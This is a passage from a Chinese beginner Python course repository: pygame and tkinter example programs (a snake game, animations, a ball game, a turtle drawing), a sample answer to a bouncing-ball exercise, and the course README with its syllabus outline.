color=Color.GREEN): """ 初始化方法 :param x: 横坐标 :param y: 纵坐标 :param size: 大小 :param color: 颜色 """ super().__init__(x, y, color) self._size = size @property def size(self): return self._size def draw(self, screen): pygame.draw.rect(screen, self._color, (self._x, self._y, self._size, self._size), 0) pygame.draw.rect(screen, Color.BLACK, (self._x, 
self._y, self._size, self._size), 1) class Snake(GameObject): """蛇""" def __init__(self, x, y, size=20, length=5): """ 初始化方法 :param x: 横坐标 :param y: 纵坐标 :param size: 大小 :param length: 初始长度 """ super().__init__() self._dir = Direction.LEFT self._nodes = [] self._alive = True self._new_dir = None for index in range(length): node = SnakeNode(x + index * size, y, size) self._nodes.append(node) @property def dir(self): return self._dir @property def alive(self): return self._alive @property def head(self): return self._nodes[0] def change_dir(self, new_dir): """ 改变方向 :param new_dir: 新方向 """ if new_dir != self._dir and \ (self._dir.value + new_dir.value) % 2 != 0: self._new_dir = new_dir def move(self): """移动""" if self._new_dir: self._dir, self._new_dir = self._new_dir, None snake_dir = self._dir x, y, size = self.head.x, self.head.y, self.head.size if snake_dir == Direction.UP: y -= size elif snake_dir == Direction.RIGHT: x += size elif snake_dir == Direction.DOWN: y += size else: x -= size new_head = SnakeNode(x, y, size) self._nodes.insert(0, new_head) self._nodes.pop() def collide(self, wall): """ 撞墙 :param wall: 围墙 """ head = self.head if head.x < wall.x or head.x + head.size > wall.x + wall.width \ or head.y < wall.y or head.y + head.size > wall.y + wall.height: self._alive = False def eat_food(self, food): """ 吃食物 :param food: 食物 :return: 吃到食物返回True否则返回False """ if self.head.x == food.x and self.head.y == food.y: tail = self._nodes[-1] self._nodes.append(tail) return True return False def eat_self(self): """咬自己""" for index in range(4, len(self._nodes)): node = self._nodes[index] if node.x == self.head.x and node.y == self.head.y: self._alive = False def draw(self, screen): for node in self._nodes: node.draw(screen) def main(): def refresh(): """刷新游戏窗口""" screen.fill(Color.GRAY) wall.draw(screen) food.draw(screen) snake.draw(screen) pygame.display.flip() def handle_key_event(key_event): """处理按键事件""" key = key_event.key if key == pygame.K_F2: reset_game() elif key in (pygame.K_a, pygame.K_w, pygame.K_d, pygame.K_s): if snake.alive: if key == pygame.K_w: new_dir = Direction.UP elif key == pygame.K_d: new_dir = Direction.RIGHT elif key == pygame.K_s: new_dir = Direction.DOWN else: new_dir = Direction.LEFT snake.change_dir(new_dir) def create_food(): """创建食物""" unit_size = snake.head.size max_row = wall.height // unit_size max_col = wall.width // unit_size row = randrange(0, max_row) col = randrange(0, max_col) return Food(wall.x + unit_size * col, wall.y + unit_size * row, unit_size) def reset_game(): """重置游戏""" nonlocal food, snake food = create_food() snake = Snake(250, 290) def background_task(): nonlocal running, food while running: if snake.alive: refresh() clock.tick(10) if snake.alive: snake.move() snake.collide(wall) if snake.eat_food(food): food = create_food() snake.eat_self() """ class BackgroundTask(Thread): def run(self): nonlocal running, food while running: if snake.alive: refresh() clock.tick(10) if snake.alive: snake.move() snake.collide(wall) if snake.eat_food(food): food = create_food() snake.eat_self() """ wall = Wall(10, 10, 600, 600) snake = Snake(250, 290) food = create_food() pygame.init() screen = pygame.display.set_mode((620, 620)) pygame.display.set_caption('贪吃蛇') # 创建控制游戏每秒帧数的时钟 clock = pygame.time.Clock() running = True # 启动后台线程负责刷新窗口和让蛇移动 # BackgroundTask().start() Thread(target=background_task).start() # 处理事件的消息循环 while running: for event in pygame.event.get(): if event.type == pygame.QUIT: running = False elif event.type == pygame.KEYDOWN: 
handle_key_event(event) pygame.quit() if __name__ == '__main__': main() File: Day01-15/code/Day10/gui3.py """ 使用tkinter创建GUI - 在窗口上制作动画 Version: 0.1 Author: 骆昊 Date: 2018-03-14 """ import tkinter import time # 播放动画效果的函数 def play_animation(): canvas.move(oval, 2, 2) canvas.update() top.after(50, play_animation) x = 10 y = 10 top = tkinter.Tk() top.geometry('600x600') top.title('动画效果') top.resizable(False, False) top.wm_attributes('-topmost', 1) canvas = tkinter.Canvas(top, width=600, height=600, bd=0, highlightthickness=0) canvas.create_rectangle(0, 0, 600, 600, fill='gray') oval = canvas.create_oval(10, 10, 60, 60, fill='red') canvas.pack() top.update() play_animation() tkinter.mainloop() # 请思考如何让小球碰到屏幕的边界就弹回 # 请思考如何用面向对象的编程思想对上面的代码进行封装 File: Day01-15/code/Day10/ball.py from enum import Enum, unique from math import sqrt from random import randint import pygame @unique class Color(Enum): """颜色""" RED = (255, 0, 0) GREEN = (0, 255, 0) BLUE = (0, 0, 255) BLACK = (0, 0, 0) WHITE = (255, 255, 255) GRAY = (242, 242, 242) @staticmethod def random_color(): """获得随机颜色""" r = randint(0, 255) g = randint(0, 255) b = randint(0, 255) return (r, g, b) class Ball(object): """球""" def __init__(self, x, y, radius, sx, sy, color=Color.RED): """初始化方法""" self.x = x self.y = y self.radius = radius self.sx = sx self.sy = sy self.color = color self.alive = True def move(self, screen): """移动""" self.x += self.sx self.y += self.sy if self.x - self.radius <= 0 or self.x + self.radius >= screen.get_width(): self.sx = -self.sx if self.y - self.radius <= 0 or self.y + self.radius >= screen.get_height(): self.sy = -self.sy def eat(self, other): """吃其他球""" if self.alive and other.alive and self != other: dx, dy = self.x - other.x, self.y - other.y distance = sqrt(dx ** 2 + dy ** 2) if distance < self.radius + other.radius \ and self.radius > other.radius: other.alive = False self.radius = self.radius + int(other.radius * 0.146) def draw(self, screen): """在窗口上绘制球""" pygame.draw.circle(screen, self.color, (self.x, self.y), self.radius, 0) def main(): # 定义用来装所有球的容器 balls = [] # 初始化导入的pygame中的模块 pygame.init() # 初始化用于显示的窗口并设置窗口尺寸 screen = pygame.display.set_mode((800, 600)) print(screen.get_width()) print(screen.get_height()) # 设置当前窗口的标题 pygame.display.set_caption('大球吃小球') # 定义变量来表示小球在屏幕上的位置 x, y = 50, 50 running = True # 开启一个事件循环处理发生的事件 while running: # 从消息队列中获取事件并对事件进行处理 for event in pygame.event.get(): if event.type == pygame.QUIT: running = False if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1: x, y = event.pos radius = randint(10, 100) sx, sy = randint(-10, 10), randint(-10, 10) color = Color.random_color() ball = Ball(x, y, radius, sx, sy, color) balls.append(ball) screen.fill((255, 255, 255)) for ball in balls: if ball.alive: ball.draw(screen) else: balls.remove(ball) pygame.display.flip() # 每隔50毫秒就改变小球的位置再刷新窗口 pygame.time.delay(50) for ball in balls: ball.move(screen) for other in balls: ball.eat(other) if __name__ == '__main__': main() File: Day01-15/code/Day10/gui1.py """ 使用tkinter创建GUI - 顶层窗口 - 控件 - 布局 - 事件回调 Version: 0.1 Author: 骆昊 Date: 2018-03-14 """ import tkinter import tkinter.messagebox def main(): flag = True # 修改标签上的文字 def change_label_text(): nonlocal flag flag = not flag color, msg = ('red', 'Hello, world!')\ if flag else ('blue', 'Goodbye, world!') label.config(text=msg, fg=color) # 确认退出 def confirm_to_quit(): if tkinter.messagebox.askokcancel('温馨提示', '确定要退出吗?'): top.quit() # 创建顶层窗口 top = tkinter.Tk() # 设置窗口大小 top.geometry('240x160') # 设置窗口标题 top.title('小游戏') # 创建标签对象 label = 
tkinter.Label(top, text='Hello, world!', font='Arial -32', fg='red') label.pack(expand=1) # 创建一个装按钮的容器 panel = tkinter.Frame(top) # 创建按钮对象 button1 = tkinter.Button(panel, text='修改', command=change_label_text) button1.pack(side='left') button2 = tkinter.Button(panel, text='退出', command=confirm_to_quit) button2.pack(side='right') panel.pack(side='bottom') # 开启主事件循环 tkinter.mainloop() if __name__ == '__main__': main() File: Day01-15/code/Day10/turtle1.py """ 用turtle模块绘图 这是一个非常有趣的模块 它模拟一只乌龟在窗口上爬行的方式来进行绘图 Version: 0.1 Author: 骆昊 Date: 2018-03-14 """ import turtle turtle.pensize(3) turtle.penup() turtle.goto(-180, 150) turtle.pencolor('red') turtle.fillcolor('yellow') turtle.pendown() turtle.begin_fill() for _ in range(36): turtle.forward(200) turtle.right(170) turtle.end_fill() turtle.mainloop()
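The gui3.py example a little earlier ends with two exercises: make the ball bounce back when it reaches the edge of the window, and rewrite the animation in an object-oriented style. Below is a minimal sketch of one possible answer, assuming the same 600x600 tkinter canvas; the class name `BouncingBall` and its method names are illustrative and not part of the course code.

```python
import tkinter


class BouncingBall:
    """A ball drawn on a tkinter canvas that reverses direction at the borders."""

    def __init__(self, canvas, x=10, y=10, size=50, speed=2):
        self._canvas = canvas
        self._oval = canvas.create_oval(x, y, x + size, y + size, fill='red')
        self._dx = self._dy = speed

    def move(self):
        x1, y1, x2, y2 = self._canvas.coords(self._oval)
        # bounce: flip the horizontal/vertical speed when a border is touched
        if x1 <= 0 or x2 >= int(self._canvas['width']):
            self._dx = -self._dx
        if y1 <= 0 or y2 >= int(self._canvas['height']):
            self._dy = -self._dy
        self._canvas.move(self._oval, self._dx, self._dy)


def main():
    top = tkinter.Tk()
    top.title('动画效果')
    top.resizable(False, False)
    canvas = tkinter.Canvas(top, width=600, height=600, bd=0, highlightthickness=0)
    canvas.create_rectangle(0, 0, 600, 600, fill='gray')
    canvas.pack()
    ball = BouncingBall(canvas)

    def play_animation():
        ball.move()
        canvas.update()
        top.after(50, play_animation)

    play_animation()
    tkinter.mainloop()


if __name__ == '__main__':
    main()
```

The same idea carries over to the pygame version in ball.py, where `Ball.move()` already flips `sx`/`sy` at the screen edges.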
## Python - 100天从新手到大师 > **作者**:骆昊 > > **说明**:从项目上线到获得8w+星标以来,一直收到反馈说基础部分(前15天的内容)对新手来说是比较困难的,建议有配套视频进行讲解。最近把基础部分的内容重新制作了一个名为[“Python-Core-50-Courses”](<https://github.com/jackfrued/Python-Core-50-Courses>)的项目,用更为简单通俗的方式重写了这部分内容并附带了视频讲解,初学者可以看看这个新的仓库。国内用户如果访问GitHub比较慢的话,可以关注我的**知乎号[Python-Jack](https://www.zhihu.com/people/jackfrued)**,上面的[“从零开始学Python”](<https://zhuanlan.zhihu.com/c_1216656665569013760>)专栏比较适合初学者,其他的专栏如“数据思维和统计思维”、“基于Python的数据分析”等也在持续创作和更新中,欢迎大家关注、点赞和评论。 > > 想获取学习视频的小伙伴,大家可以扫描下面的二维码进入微信小程序,看看有没有适合自己的内容。大家心心念念的机器学习的内容在小程序中都可以找到,由我和我的同事为大家录制的。 > > <img src="res/study_card.png" style="zoom:20%;"> > > 大家在学习过程中如果遇到一些棘手的问题或者需要相关的学习资源,可以加入下面的QQ交流群,三个群是一样的加入一个即可,请不要重复加群,也不要在群里发布广告和其他色情、低俗或敏感内容。**如果缺乏自律性,有付费学习的需求,可以添加我的微信(jackfrued)私聊,备注好自己的称呼和需求,我会给大家提供一些学习方案和职业规划方面的指导**。 > > <img src="res/python_study_qq_group.png" style="zoom:30%;"> > > 配套的视频在抖音和B站持续更新中,有兴趣的小伙伴可以关注我的抖音或B站账号,最近刚刚起号,还希望大家多多支持,非常感谢您! > > <img src="res/qrcode.JPG" style="zoom:20%;"> > > 大家一直催更的《机器学习和深度学习》因个人和公司的原因,一直处于停滞状态,近期会开始更新相关内容,感谢大家一如既往的支持和理解。 ### Python应用领域和职业发展分析 简单的说,Python是一个“优雅”、“明确”、“简单”的编程语言。 - 学习曲线低,非专业人士也能上手 - 开源系统,拥有强大的生态圈 - 解释型语言,完美的平台可移植性 - 动态类型语言,支持面向对象和函数式编程 - 代码规范程度高,可读性强 Python在以下领域都有用武之地。 - 后端开发 - Python / Java / Go / PHP - DevOps - Python / Shell / Ruby - 数据采集 - Python / C++ / Java - 量化交易 - Python / C++ / R - 数据科学 - Python / R / Julia / Matlab - 机器学习 - Python / R / C++ / Julia - 自动化测试 - Python / Shell 作为一名Python开发者,根据个人的喜好和职业规划,可以选择的就业领域也非常多。 - Python后端开发工程师(服务器、云平台、数据接口) - Python运维工程师(自动化运维、SRE、DevOps) - Python数据分析师(数据分析、商业智能、数字化运营) - Python数据挖掘工程师(机器学习、深度学习、算法专家) - Python爬虫工程师 - Python测试工程师(自动化测试、测试开发) > **说明**:目前,**数据分析和数据挖掘是非常热门的方向**,因为不管是互联网行业还是传统行业都已经积累了大量的数据,各行各业都需要数据分析师从已有的数据中发现更多的商业价值,从而为企业的决策提供数据的支撑,这就是所谓的数据驱动决策。 给初学者的几个建议: - Make English as your working language. (让英语成为你的工作语言) - Practice makes perfect. (熟能生巧) - All experience comes from mistakes. (所有的经验都源于你犯过的错误) - Don't be one of the leeches. (不要当伸手党) - Either outstanding or out. 
(要么出众,要么出局) ### Day01~15 - Python语言基础 #### Day01 - [初识Python](./Day01-15/01.初识Python.md) - Python简介 - Python的历史 / Python的优缺点 / Python的应用领域 - 搭建编程环境 - Windows环境 / Linux环境 / MacOS环境 - 从终端运行Python程序 - Hello, world / `print`函数 / 运行程序 - 使用IDLE - 交互式环境(REPL) / 编写多行代码 / 运行程序 / 退出IDLE - 注释 - 注释的作用 / 单行注释 / 多行注释 #### Day02 - [语言元素](./Day01-15/02.语言元素.md) - 程序和进制 - 指令和程序 / 冯诺依曼机 / 二进制和十进制 / 八进制和十六进制 - 变量和类型 - 变量的命名 / 变量的使用 / `input`函数 / 检查变量类型 / 类型转换 - 数字和字符串 - 整数 / 浮点数 / 复数 / 字符串 / 字符串基本操作 / 字符编码 - 运算符 - 数学运算符 / 赋值运算符 / 比较运算符 / 逻辑运算符 / 身份运算符 / 运算符的优先级 - 应用案例 - 华氏温度转换成摄氏温度 / 输入圆的半径计算周长和面积 / 输入年份判断是否是闰年 #### Day03 - [分支结构](./Day01-15/03.分支结构.md) - 分支结构的应用场景 - 条件 / 缩进 / 代码块 / 流程图 - if语句 - 简单的`if` / `if`-`else`结构 / `if`-`elif`-`else`结构 / 嵌套的`if` - 应用案例 - 用户身份验证 / 英制单位与公制单位互换 / 掷骰子决定做什么 / 百分制成绩转等级制 / 分段函数求值 / 输入三条边的长度如果能构成三角形就计算周长和面积 #### Day04 - [循环结构](./Day01-15/04.循环结构.md) - 循环结构的应用场景 - 条件 / 缩进 / 代码块 / 流程图 - while循环 - 基本结构 / `break`语句 / `continue`语句 - for循环 - 基本结构 / `range`类型 / 循环中的分支结构 / 嵌套的循环 / 提前结束程序 - 应用案例 - 1~100求和 / 判断素数 / 猜数字游戏 / 打印九九表 / 打印三角形图案 / 猴子吃桃 / 百钱百鸡 #### Day05 - [构造程序逻辑](./Day01-15/05.构造程序逻辑.md) - 经典案例:水仙花数 / 百钱百鸡 / Craps赌博游戏 - 练习题目:斐波那契数列 / 完美数 / 素数 #### Day06 - [函数和模块的使用](./Day01-15/06.函数和模块的使用.md) - 函数的作用 - 代码的坏味道 / 用函数封装功能模块 - 定义函数 - `def`关键字 / 函数名 / 参数列表 / `return`语句 / 调用自定义函数 - 调用函数 - Python内置函数 / 导入模块和函数 - 函数的参数 - 默认参数 / 可变参数 / 关键字参数 / 命名关键字参数 - 函数的返回值 - 没有返回值 / 返回单个值 / 返回多个值 - 作用域问题 - 局部作用域 / 嵌套作用域 / 全局作用域 / 内置作用域 / 和作用域相关的关键字 - 用模块管理函数 - 模块的概念 / 用自定义模块管理函数 / 命名冲突的时候会怎样(同一个模块和不同的模块) #### Day07 - [字符串和常用数据结构](./Day01-15/07.字符串和常用数据结构.md) - 字符串的使用 - 计算长度 / 下标运算 / 切片 / 常用方法 - 列表基本用法 - 定义列表 / 用下表访问元素 / 下标越界 / 添加元素 / 删除元素 / 修改元素 / 切片 / 循环遍历 - 列表常用操作 - 连接 / 复制(复制元素和复制数组) / 长度 / 排序 / 倒转 / 查找 - 生成列表 - 使用`range`创建数字列表 / 生成表达式 / 生成器 - 元组的使用 - 定义元组 / 使用元组中的值 / 修改元组变量 / 元组和列表转换 - 集合基本用法 - 集合和列表的区别 / 创建集合 / 添加元素 / 删除元素 / 清空 - 集合常用操作 - 交集 / 并集 / 差集 / 对称差 / 子集 / 超集 - 字典的基本用法 - 字典的特点 / 创建字典 / 添加元素 / 删除元素 / 取值 / 清空 - 字典常用操作 - `keys`方法 / `values`方法 / `items`方法 / `setdefault`方法 - 基础练习 - 跑马灯效果 / 列表找最大元素 / 统计考试成绩的平均分 / Fibonacci数列 / 杨辉三角 - 综合案例 - 双色球选号 / 井字棋 #### Day08 - [面向对象编程基础](./Day01-15/08.面向对象编程基础.md) - 类和对象 - 什么是类 / 什么是对象 / 面向对象其他相关概念 - 定义类 - 基本结构 / 属性和方法 / 构造器 / 析构器 / `__str__`方法 - 使用对象 - 创建对象 / 给对象发消息 - 面向对象的四大支柱 - 抽象 / 封装 / 继承 / 多态 - 基础练习 - 定义学生类 / 定义时钟类 / 定义图形类 / 定义汽车类 #### Day09 - [面向对象进阶](./Day01-15/09.面向对象进阶.md) - 属性 - 类属性 / 实例属性 / 属性访问器 / 属性修改器 / 属性删除器 / 使用`__slots__` - 类中的方法 - 实例方法 / 类方法 / 静态方法 - 运算符重载 - `__add__` / `__sub__` / `__or__` /`__getitem__` / `__setitem__` / `__len__` / `__repr__` / `__gt__` / `__lt__` / `__le__` / `__ge__` / `__eq__` / `__ne__` / `__contains__` - 类(的对象)之间的关系 - 关联 / 继承 / 依赖 - 继承和多态 - 什么是继承 / 继承的语法 / 调用父类方法 / 方法重写 / 类型判定 / 多重继承 / 菱形继承(钻石继承)和C3算法 - 综合案例 - 工资结算系统 / 图书自动折扣系统 / 自定义分数类 #### Day10 - [图形用户界面和游戏开发](./Day01-15/10.图形用户界面和游戏开发.md) - 使用`tkinter`开发GUI程序 - 使用`pygame`三方库开发游戏应用 - “大球吃小球”游戏 #### Day11 - [文件和异常](./Day01-15/11.文件和异常.md) - 读文件 - 读取整个文件 / 逐行读取 / 文件路径 - 写文件 - 覆盖写入 / 追加写入 / 文本文件 / 二进制文件 - 异常处理 - 异常机制的重要性 / `try`-`except`代码块 / `else`代码块 / `finally`代码块 / 内置异常类型 / 异常栈 / `raise`语句 - 数据持久化 - CSV文件概述 / `csv`模块的应用 / JSON数据格式 / `json`模块的应用 #### Day12 - [字符串和正则表达式](./Day01-15/12.字符串和正则表达式.md) - 字符串高级操作 - 转义字符 / 原始字符串 / 多行字符串 / `in`和`not in`运算符 / `is_xxx`方法 / `join`和`split`方法 / `strip`相关方法 / `pyperclip`模块 / 不变字符串和可变字符串 / `StringIO`的使用 - 正则表达式入门 - 正则表达式的作用 / 元字符 / 转义 / 量词 / 分组 / 零宽断言 /贪婪匹配与惰性匹配懒惰 / 使用`re`模块实现正则表达式操作(匹配、搜索、替换、捕获) - 使用正则表达式 - `re`模块 / `compile`函数 / `group`和`groups`方法 / `match`方法 / `search`方法 / `findall`和`finditer`方法 / `sub`和`subn`方法 / 
`split`方法 - 应用案例 - 使用正则表达式验证输入的字符串 #### Day13 - [进程和线程](./Day01-15/13.进程和线程.md) - 进程和线程的概念 - 什么是进程 / 什么是线程 / 多线程的应用场景 - 使用进程 - `fork`函数 / `multiprocessing`模块 / 进程池 / 进程间通信 - 使用线程 - `threading`模块 / `Thread`类 / `RLock`类 / `Condition`类 / 线程池 #### Day14 - [网络编程入门和网络应用开发](./Day01-15/14.网络编程入门和网络应用开发.md) - 计算机网络基础 - 计算机网络发展史 / “TCP-IP”模型 / IP地址 / 端口 / 协议 / 其他相关概念 - 网络应用模式 - “客户端-服务器”模式 / “浏览器-服务器”模式 - 基于HTTP协议访问网络资源 - 网络API概述 / 访问URL / `requests`三方库 / 解析JSON格式数据 - Python网络编程 - 套接字的概念 / `socket`模块 / `socket`函数 / 创建TCP服务器 / 创建TCP客户端 / 创建UDP服务器 / 创建UDP客户端 - 电子邮件 - SMTP协议 / POP3协议 / IMAP协议 / `smtplib`模块 / `poplib`模块 / `imaplib`模块 - 短信服务 - 调用短信服务网关 #### Day15 - [图像和文档处理](./Day01-15/15.图像和办公文档处理.md) - 用Pillow处理图片 - 图片读写 / 图片合成 / 几何变换 / 色彩转换 / 滤镜效果 - 读写Word文档 - 文本内容的处理 / 段落 / 页眉和页脚 / 样式的处理 - 读写Excel文件 - `xlrd` / `xlwt` / `openpyxl` ### Day16~Day20 - [Python语言进阶 ](./Day16-20/16-20.Python语言进阶.md) - 常用数据结构 - 函数的高级用法 - “一等公民” / 高阶函数 / Lambda函数 / 作用域和闭包 / 装饰器 - 面向对象高级知识 - “三大支柱” / 类与类之间的关系 / 垃圾回收 / 魔术属性和方法 / 混入 / 元类 / 面向对象设计原则 / GoF设计模式 - 迭代器和生成器 - 相关魔术方法 / 创建生成器的两种方式 / - 并发和异步编程 - 多线程 / 多进程 / 异步IO / `async`和`awai`t ### Day21~30 - [Web前端入门](./Day21-30/21-30.Web前端概述.md) - 用HTML标签承载页面内容 - 用CSS渲染页面 - 用JavaScript处理交互式行为 - jQuery入门和提高 - Vue.js入门 - Element的使用 - Bootstrap的使用 ### Day31~35 - [玩转Linux操作系统](./Day31-35/31-35.玩转Linux操作系统.md) - 操作系统发展史和Linux概述 - Linux基础命令 - Linux中的实用程序 - Linux的文件系统 - Vim编辑器的应用 - 环境变量和Shell编程 - 软件的安装和服务的配置 - 网络访问和管理 - 其他相关内容 ### Day36~45 - 数据库基础和进阶 #### Day36 - [关系型数据库和MySQL概述](./Day36-45/36.关系型数据库和MySQL概述.md) - 关系型数据库概述 - MySQL简介 - 安装MySQL - MySQL基本命令 #### Day37 - [SQL详解之DDL](./Day36-45/37.SQL详解之DDL.md) - 建库建表 - 删除表和修改表 #### Day38 - [SQL详解之DML](./Day36-45/38.SQL详解之DML.md) - insert操作 - delete操作 - update操作 #### Day39 - [SQL详解之DQL](./Day36-45/39.SQL详解之DQL.md) - 投影和别名 - 筛选数据 - 空值处理 - 去重 - 排序 - 聚合函数 - 嵌套查询 - 分组 - 表连接 - 笛卡尔积 - 内连接 - 自然连接 - 外连接 - 窗口函数 - 定义窗口 - 排名函数 - 取数函数 #### Day40 - [SQL详解之DCL](./Day36-45/40.SQL详解之DCL.md) - 创建用户 - 授予权限 - 召回权限 #### Day41 - [MySQL新特性](./Day36-45/41.MySQL新特性.md) - JSON类型 - 窗口函数 - 公共表表达式 #### Day42 - [视图、函数和过程](./Day36-45/42.视图、函数和过程.md) - 视图 - 使用场景 - 创建视图 - 使用限制 - 函数 - 内置函数 - 用户自定义函数(UDF) - 过程 - 创建过程 - 调用过程 #### Day43 - [索引](./Day36-45/43.索引.md) - 执行计划 - 索引的原理 - 创建索引 - 普通索引 - 唯一索引 - 前缀索引 - 复合索引 - 注意事项 #### Day44 - [Python接入MySQL数据库](./Day36-45/44.Python接入MySQL数据库.md) - 安装三方库 - 创建连接 - 获取游标 - 执行SQL语句 - 通过游标抓取数据 - 事务提交和回滚 - 释放连接 - 编写ETL脚本 #### Day45 - [大数据平台和HiveSQL](./Day36-45/45.大数据平台和HiveSQL.md) - Hadoop生态圈 - Hive概述 - 准备工作 - 数据类型 - DDL操作 - DML操作 - 数据查询 ### Day46~60 - 实战Django #### Day46 - [Django快速上手](./Day46-60/46.Django快速上手.md) - Web应用工作机制 - HTTP请求和响应 - Django框架概述 - 5分钟快速上手 #### Day47 - [深入模型](./Day46-60/47.深入模型.md) - 关系型数据库配置 - 使用ORM完成对模型的CRUD操作 - 管理后台的使用 - Django模型最佳实践 - 模型定义参考 #### Day48 - [静态资源和Ajax请求](./Day46-60/48.静态资源和Ajax请求.md) - 加载静态资源 - Ajax概述 - 用Ajax实现投票功能 #### Day49 - [Cookie和Session](./Day46-60/49.Cookie和Session.md) - 实现用户跟踪 - cookie和session的关系 - Django框架对session的支持 - 视图函数中的cookie读写操作 #### Day50 - [报表和日志](./Day46-60/50.制作报表.md) - 通过`HttpResponse`修改响应头 - 使用`StreamingHttpResponse`处理大文件 - 使用`xlwt`生成Excel报表 - 使用`reportlab`生成PDF报表 - 使用ECharts生成前端图表 #### Day51 - [日志和调试工具栏](./Day46-60/51.日志和调试工具栏.md) - 配置日志 - 配置Django-Debug-Toolbar - 优化ORM代码 #### Day52 - [中间件的应用](./Day46-60/52.中间件的应用.md) - 什么是中间件 - Django框架内置的中间件 - 自定义中间件及其应用场景 #### Day53 - [前后端分离开发入门](./Day46-60/53.前后端分离开发入门.md) - 返回JSON格式的数据 - 用Vue.js渲染页面 #### Day54 - [RESTful架构和DRF入门](./Day46-60/54.RESTful架构和DRF入门.md) - REST概述 - DRF库使用入门 - 前后端分离开发 - JWT的应用 #### Day55 - 
[RESTful架构和DRF进阶](./Day46-60/55.RESTful架构和DRF进阶.md) - 使用CBV - 数据分页 - 数据筛选 #### Day56 - [使用缓存](./Day46-60/56.使用缓存.md) - 网站优化第一定律 - 在Django项目中使用Redis提供缓存服务 - 在视图函数中读写缓存 - 使用装饰器实现页面缓存 - 为数据接口提供缓存服务 #### Day57 - [接入三方平台](./Day46-60/57.接入三方平台.md) - 文件上传表单控件和图片文件预览 - 服务器端如何处理上传的文件 #### Day58 - [异步任务和定时任务](./Day46-60/58.异步任务和定时任务.md) - 网站优化第二定律 - 配置消息队列服务 - 在项目中使用Celery实现任务异步化 - 在项目中使用Celery实现定时任务 #### Day59 - [单元测试](./Day46-60/59.单元测试.md) #### Day60 - [项目上线](./Day46-60/60.项目上线.md) - Python中的单元测试 - Django框架对单元测试的支持 - 使用版本控制系统 - 配置和使用uWSGI - 动静分离和Nginx配置 - 配置HTTPS - 配置域名解析 ### Day61~65 - [爬虫开发](./Day61-65) #### Day61 - [网络数据采集概述](./Day61-65/61.网络数据采集概述.md) - 网络爬虫的概念及其应用领域 - 网络爬虫的合法性探讨 - 开发网络爬虫的相关工具 - 一个爬虫程序的构成 #### Day62 - 数据抓取和解析 - [使用`requests`三方库实现数据抓取](./Day61-65/62.用Python获取网络资源-1.md) - [页面解析的三种方式](./Day61-65/62.用Python解析HTML页面-2.md) - 正则表达式解析 - XPath解析 - CSS选择器解析 #### Day63 - Python中的并发编程 - [多线程](./Day61-65/63.Python中的并发编程-1.md) - [多进程](./Day61-65/63.Python中的并发编程-2.md) - [异步I/O](./Day61-65/63.Python中的并发编程-3.md) #### Day64 - [使用Selenium抓取网页动态内容](./Day61-65/64.使用Selenium抓取网页动态内容.md) - 安装Selenium - 加载页面 - 查找元素和模拟用户行为 - 隐式等待和显示等待 - 执行JavaScript代码 - Selenium反爬破解 - 设置无头浏览器 #### Day65 - [爬虫框架Scrapy简介](./Day61-65/65.爬虫框架Scrapy简介.md) - Scrapy核心组件 - Scrapy工作流程 - 安装Scrapy和创建项目 - 编写蜘蛛程序 - 编写中间件和管道程序 - Scrapy配置文件 ### Day66~80 - 数据分析 #### Day66 - [数据分析概述](./Day66-80/66.数据分析概述.md) - 数据分析师的职责 - 数据分析师的技能栈 - 数据分析相关库 #### Day67 - [环境准备](./Day66-80/67.环境准备.md) - 安装和使用anaconda - conda相关命令 - 安装和使用jupyter-lab - 安装和启动 - 使用小技巧 #### Day68 - [NumPy的应用-1](./Day66-80/68.NumPy的应用-1.md) - 创建数组对象 - 数组对象的属性 - 数组对象的索引运算 - 普通索引 - 花式索引 - 布尔索引 - 切片索引 - 案例:使用数组处理图像 #### Day69 - [NumPy的应用-2](./Day66-80/69.NumPy的应用-2.md) - 数组对象的相关方法 - 获取描述性统计信息 - 其他相关方法 #### Day70 - [NumPy的应用-3](./Day66-80/70.NumPy的应用-3.md) - 数组的运算 - 数组跟标量的运算 - 数组跟数组的运算 - 通用一元函数 - 通用二元函数 - 广播机制 - Numpy常用函数 #### Day71 - [NumPy的应用-4](./Day66-80/71.NumPy的应用-4.md) - 向量 - 行列式 - 矩阵 - 多项式 #### Day72 - [深入浅出pandas-1](./Day66-80/72.深入浅出pandas-1.md) - 创建`Series`对象 - `Series`对象的运算 - `Series`对象的属性和方法 #### Day73 - [深入浅出pandas-2](./Day66-80/73.深入浅出pandas-2.md) - 创建`DataFrame`对象 - `DataFrame`对象的属性和方法 - 读写`DataFrame`中的数据 #### Day74 - [深入浅出pandas-3](./Day66-80/74.深入浅出pandas-3.md) - 数据重塑 - 数据拼接 - 数据合并 - 数据清洗 - 缺失值 - 重复值 - 异常值 - 预处理 #### Day75 - [深入浅出pandas-4](./Day66-80/75.深入浅出pandas-4.md) - 数据透视 - 获取描述性统计信息 - 排序和头部值 - 分组聚合 - 透视表和交叉表 - 数据呈现 #### Day76 - [深入浅出pandas-5](./Day66-80/76.深入浅出pandas-5.md) - 计算同比环比 - 窗口计算 - 相关性判定 #### Day77 - [深入浅出pandas-6](./Day66-80/77.深入浅出pandas-6.md) - 索引的使用 - 范围索引 - 分类索引 - 多级索引 - 间隔索引 - 日期时间索引 #### Day78 - [数据可视化-1](./Day66-80/78.数据可视化-1.md) - 安装和导入matplotlib - 创建画布 - 创建坐标系 - 绘制图表 - 折线图 - 散点图 - 柱状图 - 饼状图 - 直方图 - 箱线图 - 显示和保存图表 #### Day79 - [数据可视化-2](./Day66-80/79.数据可视化-2.md) - 高阶图表 - 气泡图 - 面积图 - 雷达图 - 玫瑰图 - 3D图表 #### Day80 - [数据可视化-3](./Day66-80/80.数据可视化-3.md) - Seaborn - Pyecharts ### Day81~90 - [机器学习和深度学习](./Day81-90) #### Day81 - [机器学习基础](./Day81-90/81.机器学习基础.md) #### Day82 - [k最近邻分类](./Day81-90/82.k最近邻分类.md) #### Day83 - [决策树](./Day81-90/83.决策树.md) #### Day84 - [贝叶斯分类](./Day81-90/84.贝叶斯分类.md) #### Day85 - [支持向量机](./Day81-90/85.支持向量机.md) #### Day86 - [K-均值聚类](./Day81-90/86.K-均值聚类.md) #### Day87 - [回归分析](./Day81-90/87.回归分析.md) #### Day88 - [深度学习入门](./Day81-90/88.深度学习入门.md) #### Day89 - [PyTorch概述](./Day81-90/89.PyTorch概述.md) #### Day90 - [PyTorch实战](./Day81-90/90.PyTorch实战.md) ### Day91~100 - [团队项目开发](./Day91-100) #### 第91天:[团队项目开发的问题和解决方案](./Day91-100/91.团队项目开发的问题和解决方案.md) 1. 
